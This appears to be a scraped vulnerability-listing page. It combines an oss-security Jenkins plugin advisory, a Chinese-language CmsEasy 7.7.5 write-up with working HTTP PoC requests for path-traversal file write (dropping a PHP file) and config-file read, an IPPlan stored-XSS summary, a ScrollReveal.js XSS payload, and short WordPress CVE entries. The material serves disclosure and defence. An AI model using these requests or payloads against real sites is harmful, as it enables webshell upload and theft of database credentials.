A cross-site request forgery (CSRF) vulnerability in Jenkins Script Security Plugin 1158.v7c1b_73a_69a_08 and earlier allows attackers to have Jenkins send an HTTP request to an attacker-specified webserver.

*   Products
    *   Openwall GNU/\*/Linux   _server OS_
    *   Linux Kernel Runtime Guard
    *   John the Ripper   _password cracker_
        *   Free & Open Source for any platform
        *   in the cloud
        *   Pro for Linux
        *   Pro for macOS
    *   Wordlists   _for password cracking_
    *   passwdqc   _policy enforcement_
        *   Free & Open Source for Unix
        *   Pro for Windows (Active Directory)
    *   yescrypt   _KDF & password hashing_
    *   yespower   _Proof-of-Work (PoW)_
    *   crypt\_blowfish   _password hashing_
    *   phpass   _ditto in PHP_
    *   tcb   _better password shadowing_
    *   Pluggable Authentication Modules
    *   scanlogd   _port scan detector_
    *   popa3d   _tiny POP3 daemon_
    *   blists   _web interface to mailing lists_
    *   msulogin   _single user mode login_
    *   php\_mt\_seed   _mt\_rand() cracker_
*   Services
*   Publications
    *   Articles
    *   Presentations
*   Resources
    *   Mailing lists
    *   Community wiki
    *   Source code repositories (GitHub)
    *   Source code repositories (CVSweb)
    *   File archive & mirrors
    *   How to verify digital signatures
    *   OVE IDs
*   What's new

\[<prev\] \[next>\] \[day\] \[month\] \[year\] \[list\]

Date: Tue, 17 May 2022 15:13:45 +0200
From: Daniel Beck <ml@...kweb.net>
To: oss-security@...ts.openwall.com
Subject: Multiple vulnerabilities in Jenkins plugins


Jenkins is an open source automation server which enables developers around
the world to reliably build, test, and deploy their software.

The following releases contain fixes for security vulnerabilities:

\* Application Detector Plugin 1.0.9
\* Blue Ocean Plugin 1.25.4
\* Git Plugin 4.11.2
\* GitLab Plugin 1.5.32
\* Mercurial Plugin 2.16.1
\* Multiselect parameter Plugin 1.4
\* Pipeline SCM API for Blue Ocean Plugin 1.25.4
\* Pipeline: Groovy Plugin 2692.v76b\_089ccd026
\* REPO Plugin 1.14.1
\* Rundeck Plugin 3.6.11
\* Script Security Plugin 1172.v35f6a\_0b\_8207e
\* WMI Windows Agents Plugin 1.8.1

Additionally, we announce unresolved security issues in the following
plugins:

\* Autocomplete Parameter Plugin
\* Global Variable String Parameter Plugin
\* JDK Parameter Plugin
\* Promoted Builds (Simple) Plugin
\* Random String Parameter Plugin
\* Selection tasks Plugin
\* SSH Plugin
\* Storable Configs Plugin
\* vboxwrapper Plugin

Summaries of the vulnerabilities are below. More details, severity, and
attribution can be found here:
https://www.jenkins.io/security/advisory/2022-05-17/

We provide advance notification for security updates on this mailing list:
https://groups.google.com/d/forum/jenkinsci-advisories

If you discover security vulnerabilities in Jenkins, please report them as
described here:
https://www.jenkins.io/security/#reporting-vulnerabilities

---

SECURITY-359 / CVE-2022-30945
Pipeline: Groovy Plugin allows pipelines to load Groovy source files. This
is intended to be used to allow Global Shared Libraries to execute without
sandbox protection.

In Pipeline: Groovy Plugin 2689.v434009a\_31b\_f1 and earlier, any Groovy
source files bundled with Jenkins core and plugins could be loaded this way
and their methods executed. If a suitable Groovy source file is available
on the classpath of Jenkins, sandbox protections can be bypassed.

NOTE: The Jenkins security team has been unable to identify any Groovy
source files in Jenkins core or plugins that would allow attackers to
execute dangerous code. While the severity of this issue is declared as
High due to the potential impact, successful exploitation is considered
very unlikely.


SECURITY-2116 / CVE-2022-30946
Script Security Plugin 1158.v7c1b\_73a\_69a\_08 and earlier does not require
POST requests for a form validation endpoint, resulting in a cross-site
request forgery (CSRF) vulnerability.

This vulnerability allows attackers to have Jenkins send an HTTP request to
an attacker-specific webserver.


SECURITY-2478 / CVE-2022-30947 (Git) & CVE-2022-30948 (Mercurial) & CVE-2022-30949 (REPO)
SCMs support a number of different URL schemes, including local file system
paths (e.g. using \`file:\` URLs).

Historically in Jenkins, only agents checked out from SCM, and if multiple
projects share the same agent, there is no expected isolation between
builds besides using different workspaces unless overridden. Some
Pipeline-related features check out SCMs from the Jenkins controller as
well.

This allows attackers able to configure pipelines to check out some SCM
repositories stored on the Jenkins controller's file system using local
paths as SCM URLs, obtaining limited information about other projects' SCM
contents. The following Jenkins plugins are known to be affected:

\* Git 4.11.1 and earlier
\* Mercurial 2.16 and earlier
\* REPO 1.14.0 and earlier


SECURITY-2604 / CVE-2022-30950 (buffer overflow) & CVE-2022-30951 (access control)
WMI Windows Agents Plugin 1.8 and earlier includes the Windows Remote
Command library. It provides a general-purpose remote command execution
capability that Jenkins uses to check if Java is available, and if not, to
install it.

This library has a buffer overflow vulnerability that may allow users able
to connect to a named pipe to execute commands on the Windows agent
machine.

Additionally, while the processes are started as the user who connects to
the named pipe, no access control takes place, potentially allowing users
to start processes even if they're not allowed to log in.


SECURITY-714 / CVE-2022-30952
When pipelines are created using the pipeline creation wizard in Blue
Ocean, the credentials used are stored in the per-user credentials store of
the user creating the pipeline. To allow pipelines to use this credential
to scan repositories and checkout from SCM, the Blue Ocean Credentials
Provider allows pipelines to access a specific credential from the per-user
credentials store in Pipeline SCM API for Blue Ocean Plugin 1.25.3 and
earlier.

As a result, attackers with Job/Configure permission can rewrite job
configurations in a way that lets them access and capture any
attacker-specified credential from any user's private credentials store.


SECURITY-2502 / CVE-2022-30953 (CSRF) & CVE-2022-30954 (permission check)
Blue Ocean Plugin 1.25.3 and earlier does not perform permission checks in
several HTTP endpoints.

This allows attackers with Overall/Read permission to send requests to an
attacker-specified URL.

Additionally, these endpoints do not require POST requests, resulting in a
cross-site request forgery (CSRF) vulnerability.


SECURITY-2753 / CVE-2022-30955
GitLab Plugin 1.5.31 and earlier does not perform a permission check in an
HTTP endpoint.

This allows attackers with Overall/Read permission to enumerate credentials
IDs of credentials stored in Jenkins. Those can be used as part of an
attack to capture the credentials using another vulnerability.


SECURITY-2600 / CVE-2022-30956
Rundeck Plugin 3.6.10 and earlier does not restrict URL schemes in Rundeck
webhook submissions.

This results in a stored cross-site scripting (XSS) vulnerability
exploitable by attackers able to submit crafted Rundeck webhook payloads.


SECURITY-2315 / CVE-2022-30957
SSH Plugin 2.6.1 and earlier does not perform a permission check in an HTTP
endpoint.

This allows attackers with Overall/Read permission to enumerate credentials
IDs of credentials stored in Jenkins. Those can be used as part of an
attack to capture the credentials using another vulnerability.

As of publication of this advisory, there is no fix.


SECURITY-2093 / CVE-2022-30958 (CSRF) & CVE-2022-30959 (permission check)
SSH Plugin 2.6.1 and earlier does not perform a permission check in an HTTP
endpoint.

This allows attackers with Overall/Read permission to connect to an
attacker-specified SSH server using attacker-specified credentials IDs
obtained through another method, capturing credentials stored in Jenkins.

Additionally, this endpoint does not require POST requests, resulting in a
cross-site request forgery (CSRF) vulnerability.

As of publication of this advisory, there is no fix.


SECURITY-2717 / CVE-2022-30960 through CVE-2022-30968
Multiple plugins do not escape the name and description of the parameter
types they provide:

\* Application Detector Plugin 1.0.8 and earlier (SECURITY-2732 /
  CVE-2022-30960)
\* Autocomplete Parameter Plugin 1.1 and earlier (SECURITY-2729 /
  CVE-2022-30961)
\* Global Variable String Parameter Plugin 1.2 and earlier (SECURITY-2715 /
  CVE-2022-30962)
\* JDK Parameter Plugin 1.0 and earlier (SECURITY-2713 / CVE-2022-30963)
\* Multiselect parameter Plugin 1.3 and earlier (SECURITY-2726 /
  CVE-2022-30964)
\* Promoted Builds (Simple) Plugin 1.9 and earlier (SECURITY-2720 /
  CVE-2022-30965)
\* Random String Parameter Plugin 1.0 and earlier (SECURITY-2722 /
  CVE-2022-30966)
\* Selection tasks Plugin 1.0 and earlier (SECURITY-2728 / CVE-2022-30967)
\* vboxwrapper Plugin 1.3 and earlier (SECURITY-2734 / CVE-2022-30968)

This results in stored cross-site scripting (XSS) vulnerabilites
exploitable by attackers with Item/Configure permission.

Exploitation of these vulnerabilities requires that parameters are listed
on another page, like the "Build With Parameters" and "Parameters" pages
provided by Jenkins (core), and that those pages are not hardened to
prevent exploitation. Jenkins (core) has prevented exploitation of
vulnerabilities of this kind on the "Build With Parameters" and
"Parameters" pages since 2.44 and LTS 2.32.2 as part of the SECURITY-353 /
CVE-2017-2601 fix. Additionally, several plugins have previously been
updated to list parameters in a way that prevents exploitation by default,
see SECURITY-2617 in the 2022-04-12 security advisory for a list.

As of publication of this advisory, there is no fix available for the
following plugins:

\* Autocomplete Parameter Plugin 1.1 and earlier (SECURITY-2729 /
  CVE-2022-30961)
\* Global Variable String Parameter Plugin 1.2 and earlier (SECURITY-2715 /
  CVE-2022-30962)
\* JDK Parameter Plugin 1.0 and earlier (SECURITY-2713 / CVE-2022-30963)
\* Promoted Builds (Simple) Plugin 1.9 and earlier (SECURITY-2720 /
  CVE-2022-30965)
\* Random String Parameter Plugin 1.0 and earlier (SECURITY-2722 /
  CVE-2022-30966)
\* Selection tasks Plugin 1.0 and earlier (SECURITY-2728 / CVE-2022-30967)
\* vboxwrapper Plugin 1.3 and earlier (SECURITY-2734 / CVE-2022-30968)


SECURITY-2322 / CVE-2022-30969
Autocomplete Parameter Plugin 1.1 and earlier does not require POST
requests for a form validation endpoint executing a provided Groovy script,
resulting in a cross-site request forgery (CSRF) vulnerability.

This vulnerability allows attackers to execute arbitrary code without
sandbox protection if the victim is an administrator.

As of publication of this advisory, there is no fix.


SECURITY-2267 / CVE-2022-30970
Autocomplete Parameter Plugin 1.1 and earlier references Dropdown
Autocomplete parameter and Auto Complete String parameter names in an
unsafe manner from Javascript embedded in view definitions.

This results in a stored cross-site scripting (XSS) vulnerability
exploitable by attackers with Item/Configure permission.

NOTE: While this looks similar to SECURITY-2729, this is an independent
problem and exploitable even on views rendering parameters that otherwise
attempt to prevent XSS vulnerabilities in parameter names.

As of publication of this advisory, there is no fix.


SECURITY-1969 / CVE-2022-30971 (XXE) & CVE-2022-30972 (CSRF)
Storable Configs Plugin 1.0 and earlier does not configure its XML parser
to prevent XML external entity (XXE) attacks.

This allows attackers with Item/Configure permission to have Jenkins parse
a crafted file that uses external entities for extraction of secrets from
the Jenkins controller or server-side request forgery.

Additionally, the HTTP endpoint calling the XML parser does not require
POST requests, resulting in a cross-site request forgery (CSRF)
vulnerability.

As of publication of this advisory, there is no fix.

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.

CVE-2022-30946: security - Multiple vulnerabilities in Jenkins plugins

cmseasy V7.7.5_20211012 is affected by an arbitrary file read vulnerability. After login, the configuration file information of the website such as the database configuration file (config / config_database) can be read through this vulnerability.

*   0day挖掘
*   2021-10-14

CmsEasy\_7.7.5\_20211012存在任意文件写入漏洞和任意文件读取漏洞

**一、厂商官网**

cmseasy

**二、安装包下载**

https://www.cmseasy.cn/download/

https://ftp.cmseasy.cn/CmsEasy7.x/CmsEasy\_7.7.5\_UTF-8\_20211012.zip

**2.1 任意文件写入漏洞getshell**

后台漏洞，需登录。

**2.2.1 任意文件写入漏洞poc**

1  
2  
3  
4  
5  
6  
7  
8  
9  
10  

POST /index.php?case=template&act=save&admin\_dir=admin&site=default HTTP/1.1  
Host: 192.168.31.96  
Content-Length: 57  
X-Requested-With: XMLHttpRequest  
User-Agent: Mozilla/5.0  
Content-Type: application/x-www-form-urlencoded;  
Cookie: login\_username=admin; login\_password=357fce333f91905f3e7342d10e5a5ce4;  
Connection: close  
  
sid=#data\_d\_..\_d\_..\_d\_..\_d\_1.php&slen=693&scontent=<?php phpinfo();?>  

.._d_ 代表  ../，此处用来路径穿越

发送漏洞利用的poc数据包，响应内容是ok时，代表网站根目录下被写入了1.php文件。

访问http://192.168.31.96/1.php (或者是http://localhost/1.php)，此时发现phpinfo被成功执行。

**2.2.2 任意文件写入漏洞代码分析**

出现此漏洞的文件是lib/admin/template_admin.php

post方法传入sid=#data_d_.._d_.._d_.._d_1.php，经过一轮的正则替换，最后tpl=data/../../../1.php

post方法传入scontent=<?php phpinfo();?>，先通过编码实例化，再通过正则替换将单引号转义，此时content=<?php phpinfo();?>，这里的正则处理是对XSS漏洞的处理，对写入的php代码不生效。

当site=default时，代码执行到最外层else处（第2789行），此过程中，content值不变，通过file_put_contents造成了任意文件写入漏洞。

**2.2 任意文件读取漏洞**

后台漏洞，需登录。

**2.2.1 任意文件读取漏洞poc**

1  
2  
3  
4  
5  
6  
7  
8  
9  
10  

POST /index.php?case=template&act=fetch&admin\_dir=admin&site=default HTTP/1.1  
Host: 192.168.31.96  
X-Requested-With: XMLHttpRequest  
User-Agent: Mozilla/5.0  
Content-Type: application/x-www-form-urlencoded;  
Cookie: login\_username=admin; login\_password=357fce333f91905f3e7342d10e5a5ce4;   
Connection: close  
Content-Length: 32  
  
id=#data\_d\_..\_d\_..\_d\_..\_d\_config\_d\_config\_database.php  

.._d_ 代表  ../，此处用来路径穿越

发送漏洞利用的poc数据包

响应内容是cmseasy网站配置文件config/config_database.php的文件内容信息。

该响应信息中包含了数据库连接地址账号以及密码。

**2.2.2 任意文件读取漏洞代码分析**

出现此漏洞的文件是lib/admin/template_admin.php

post方法传入id=#data_d_.._d_.._d_.._d_config_d_config_database.php

通过一系列的正则替换tpl=data/../../../config/config_database.php

最后通过第2757行的file_get_contents函数读取到了配置文件信息。

CVE-2021-42644: CmsEasy_7.7.5_20211012存在任意文件写入和任意文件读取漏洞

Stored cross-site scripting (XSS) in admin/usermanager.php over IPPlan v4.92b allows remote attackers to inject arbitrary web script or HTML via the userid parameter.

May 16, 2022 Uncategorized

Stored cross-site scripting (XSS) in admin/usermanager.php over IPPlan v4.92b allows remote attackers to inject arbitrary web script or HTML via the userid parameter

*   https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42943
*   https://vuldb.com/?id.200027

**Details**

In a nutshell, given the lack of validations among certain input fields controlled by the user, we can only notice a “trim” for the userid parameter(code:admin/usermanager.php -> administrator$userid=trim($userid);) that’s also accepting strings in a form that should not be controlled by the user during the user creation:

User creation

Given the way this data is stored in the database and rendered by the PHP application (i.e., directly from the DB), it makes possible to proceed with different set of injections such as the example below with our javascript injection, corresponding the CVE-2021-42943

DB data

Persistent XSS PoC

**Remediation**

Although ipplan isn’t a brand new application, it seems we have different organizations relying on its functionalities as the information provided can be very useful in order to track the network segmentation across a given environment. If this is your scenario and you want to get rid of such vulnerabilities, ensure to avoid the user ID parameter of the UI and let the database control such information with the proper increment, having the primary keys and foreign keys accordingly which will require a few changes on the code and also in the database structure. Another option that can reduce the impact of such scenario is to use an INT data type for your column. Also, ensure to add the validation/sanitization such as the usage of htmlspecialchars() function within PHP in order to convert special characters to HTML entities correctly.

CVE-2021-42943: CVE-2021-42943 – Summary – Paulo Hennig

Gnuboard 5.55 and 5.56 is vulnerable to Cross Site Scripting (XSS) via bbs/member_confirm.php.

CVE-2022-30050

The Custom TinyMCE Shortcode Button WordPress plugin through 1.1 does not sanitise and escape the PHP_SELF variable before outputting it back in an attribute in an admin page, leading to Reflected Cross-Site Scripting.

CVE-2022-1217

The Advanced Image Sitemap WordPress plugin through 1.2 does not sanitise and escape the PHP_SELF PHP variable before outputting it back in an attribute in an admin page, leading to Reflected Cross-Site Scripting.

CVE-2022-1216

The VikBooking Hotel Booking Engine & PMS WordPress plugin before 1.5.8 does not properly validate images, allowing high privilege users such as administrators to upload PHP files disguised as images and containing malicious PHP code

CVE-2022-1409

The ScrollReveal.js Effects WordPress plugin through 1.2 does not sanitise and escape its settings, which could allow high privilege users to perform Cross-Site Scripting attacks even when unfiltered_html is disallowed

    # Exploit Title: WordPress Plugin ScrollReveal.js Effects - Stored Cross Site Scripting# Date: 25-04-2022# Exploit Author: Mariam Tariq - Hunt3rsherlock_# Vendor Homepage: https://wordpress.org/plugins/scrollrevealjs-effects/# Version: 1.1.1# Tested on: Firefox# Contact me: mariamtariq404@gmail.com# Vulnerable Code: ``` <input id="src-opacity" type="text" name="sr_config[vFactor]" value="<?phpecho $options['vFactor']; ?>" placeholder="Element ratio in float" />```# POC1. Install ScrollReveal.js Effects WordPress plugin and activate.2. Go to configuration and on vFactor field inject XSS payload “><img src=xonerror=alert(‘’XSS>3. XSS will trigger.## PoC Imagehttps://imgur.com/a/uQRT2mDhttps://imgur.com/1BB80ep

CVE-2022-1512: WordPress ScrollReveal.js Effects 1.1.1 Cross Site Scripting ≈ Packet Storm

The AGIL WordPress plugin through 1.0 accepts all zip files and automatically extracts the zip file without validating the extracted file type. Allowing high privilege users such as admin to upload an arbitrary file like PHP, leading to RCE

CVE-2021-25119

The Advanced Uploader WordPress plugin through 4.2 allows any authenticated users like subscriber to upload arbitrary files, such as PHP, which could lead to RCE

Tag

#php